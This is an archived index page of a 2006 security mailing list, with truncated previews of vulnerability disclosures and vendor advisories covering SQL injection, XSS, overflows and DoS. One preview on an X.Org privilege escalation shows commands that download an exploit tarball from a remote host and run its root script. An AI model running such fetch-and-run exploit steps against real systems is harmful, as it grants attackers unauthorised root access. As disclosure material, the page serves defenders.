|
|
Prev week |
Colapse all |
Post message
[SECURITY] [DSA 1013-1] New snmptrapfmt packages fix insecure temporary file 2006-03-22 joey infodrom org (Martin Schulze) cutenews 1.4.1 Arbitrary File Access 2006-03-22 h e (het_ebadi yahoo com) cutenews 1.4.1 Arbitrary File Access Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection ... http://cutephp.com Credit: The inf [ more ] [ reply ] WinHKI 1.6x Archive Extraction Directory traversal 2006-03-22 h e (het_ebadi yahoo com) WinHKI 1.6x Archive Extraction Directory traversal WinHKI Archiver administrator ask me for penetration test. here is the result : WinHKI Archiver: compression (hki, cab, zip, gzip, tar, jar...) extract 14 formats (hki, rar, ace, zip, gzip, tar, ...) Encryption / Decryption support Full zip sup [ more ] [ reply ] DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline attack' 2006-03-21 KF (lists) (kf_lists digitalmunition com) DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline attack' Author: Kevin Finisterre Vendor: http://www.motorola.com Product: 'Motorola PEBL U6, Motorola V600, other Motorola P2k based phones?' References: http://www.digitalmunition.com/DMA[2006-0321a].txt http://www.motorola. [ more ] [ reply ] [eVuln] PHP SimpleNEWS, PHP SimpleNEWS MySQL - Authentication Bypass Vulnerability 2006-03-22 alex evuln com New eVuln Advisory: PHP SimpleNEWS, PHP SimpleNEWS MySQL - Authentication Bypass Vulnerability http://evuln.com/vulns/94/summary.html --------------------Summary---------------- eVuln ID: EV0094 Vendor: Himpfen Consulting Company Vendor's Web Site: http://www.himpfenconsulting.com/ Software: PHP Si [ more ] [ reply ] FreeBSD Security Advisory FreeBSD-SA-06:11.ipsec 2006-03-22 FreeBSD Security Advisories (security-advisories freebsd org) FreeBSD Security Advisory FreeBSD-SA-06:12.opie 2006-03-22 FreeBSD Security Advisories (security-advisories freebsd org) FreeBSD Security Advisory FreeBSD-SA-06:13.sendmail 2006-03-22 FreeBSD Security Advisories (security-advisories freebsd org) Mini-Nuke<=1.8.2 SQL injection (6) 2006-03-21 dabdoub_mosikar forislam com //mini-nuke board turk have many sql injection founded by Moroccan Security Team //Creetz to: Moroccan Security Team [Dr.E-vil,Dr.Erase,H0550N,|ucifer,DaBDouB-MoSiKaR [OverclockiX],ki11er] ,Dranzelz,Esp!onLeRaVaGe,ameer,www.lezr.com and all muslim [morocco] [1] http://[target]/members.asp?action=me [ more ] [ reply ] ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities 2006-03-21 nukedx nukedx com --Security Report-- Advisory: ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 20/03/06 11:14 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: ASPPortal (http://www.A [ more ] [ reply ] Free Articles Directory Remote Command Exucetion 2006-03-21 botan linuxmail org Web Site : http://www.99articles.com Script Demo Site : http://www.articlesone.com General : 1. Support rssfeed (XML) to distribute articles for others website and blogs. It will make grow website popularity 2. Newsletter to be growing visitors 3. Membership system for writer participants submi [ more ] [ reply ] [ GLSA 200603-20 ] Macromedia Flash Player: Arbitrary code execution 2006-03-21 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [ GLSA 200603-19 ] cURL/libcurl: Buffer overflow in the handling of TFTP URLs 2006-03-21 Matthias Geerdsen (vorlon gentoo org) Recon 2006: Guest speakers announcement. Call for paper and early registration ending in less than 2 weeks. 2006-03-21 Hugo Fortier (hfortier recon cx) Recon 2006 - 16th 17th 18th June 2006 - Plaza Hotel, Montreal - recon.cx ------------------------------------------------------------------------ We are pleased to announce the guest speakers of Recon 2006 : Anthony de Almeida Lopes: Multi-cavity NOP-infection Operating System- Independent x86 Vi [ more ] [ reply ] Cisco Aironet 1300 DoS condition 2006-03-21 Alex (netshark gaiajoy com) Cisco Aironet 1300 DoS condition Synopsis ======== Cisco Aironet 1300 running IOS 12.3(8)JA with default settings is vulnerable to a DoS condition. Background ============= Cisco Aironet 1300 is the state-of-art enterprise p2p wireless repeater from Cisco. Supports a wide range of features, includ [ more ] [ reply ] XSS in Firepass 4100 SSL VPN v.5.4.2 (and probably others) 2006-03-21 alfy coders ch Vulnerability class : Cross-Site Scripting Discovery date : 2nd of February 2006 Remote : Yes Local : No Credit : ILION Research Labs, Geneva Switzerland Vulnerable : F5 Firepass 4100 SSL VPN v. 5.4.2 A XSS (Cross-Site-Scripting) vulnerability has been uncovered in my.support.php3 called through a [ more ] [ reply ] [SECURITY] [DSA 1011-1] New kernel-patch-vserver packages fix root exploit 2006-03-21 joey infodrom org (Martin Schulze) [SECURITY] [DSA 1012-1] New unzip packages fix arbitrary code execution 2006-03-21 joey infodrom org (Martin Schulze) [ GLSA 200603-18 ] Pngcrush: Buffer overflow 2006-03-21 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [ GLSA 200603-17 ] PeerCast: Buffer overflow 2006-03-21 Sune Kloppenborg Jeppesen (jaervosz gentoo org) CORE-2006-0124: Cross-Site Scripting in Verisign?s haydn.exe CGI script 2006-03-20 CORE Security Technologies Advisories (advisories coresecurity com) Re: Invision Power Board v2.1.4 - session hijacking 2006-03-20 Hans Wolters (hans wolters xs4all nl) Matt, On 17-mrt-2006, at 10:26, matt (at) invisionpower (dot) com [email concealed] wrote: p.s. ^^^ that email address does not work, and earlier reply got bounced. > My problem with this report is this: > > 1) You've not even read the IPB code. You've stated elsewhere that > "using sessions in the URL may appear in JS p [ more ] [ reply ] [ MDKSA-2006:057 ] - Updated cairo packages to address Evolution DoS vulnerability 2006-03-20 security mandriva com [ MDKSA-2006:056 ] - Updated xorg-x11 packages to address local root vuln 2006-03-20 security mandriva com DNS Amplification Attacks 2006-03-17 Gadi Evron (ge linuxbox org) In this paper we address in detail how the recent DNS DDoS attacks work. How they abuse name servers, EDNS, the recursive feature and UDP packet spoofing, as well as how the amplification effect works. Our study is based on packet captures (we provide with samples) and logs from attacks on differ [ more ] [ reply ] Re: Invision Power Board v2.1.4 - session hijacking 2006-03-16 Bill Nash (billn odyssey billn net) On Thu, 16 Mar 2006, matt (at) invisionpower (dot) com [email concealed] wrote: > This report is ridiculous and quite frankly shows that the author does not understand how IPB works. > > Yes, the author is correct in finding that if you: copy the user's IP address, copy the user's user-agent and copy the user's session ID th [ more ] [ reply ] RE: Generically Determining the Prescence of Virtual Machines 2006-03-20 Thomas Guyot-Sionnest (Thomas zango com) I suggest you make sure you're using the accelerator mode, which should put qemu in "Virtualization" mode. If you're doing full CPU emulation then the result you get was correct: you weren't doing any virtualization inside qemu. Thomas > -----Original Message----- > From: Jeff Epler [mailto:jeple [ more ] [ reply ] Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 2006-03-20 H D Moore (sflist digitaloffense net) Two second exploit, but if anyone is lazy: $ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz $ tar -zpxvf xmodulepath.tgz $ cd xmodulepath $ ./root.sh /bin/rm -f exploit.o exploit.so shell *.o *.so gcc -fPIC -c exploit.c gcc -shared -nostdlib exploit.o -o exploit.so gcc -o shell shell. [ more ] [ reply ] Symantec Security Advisory, SYM06-005 2006-03-20 secure symantec com Symantec Security Advisory SYM06-005 17 March 2006 Veritas Backup Exec for Windows Servers: Media Server BENGINE Service Job log Format String Overflow Revision History None Severity Low (network/system authorization and specific configuration required) Remote Access Yes Local Access No Authe [ more ] [ reply ] |
|
Privacy Statement |
Hash: SHA1
- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1013-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
March 22nd, 2006
[ more ] [ reply ]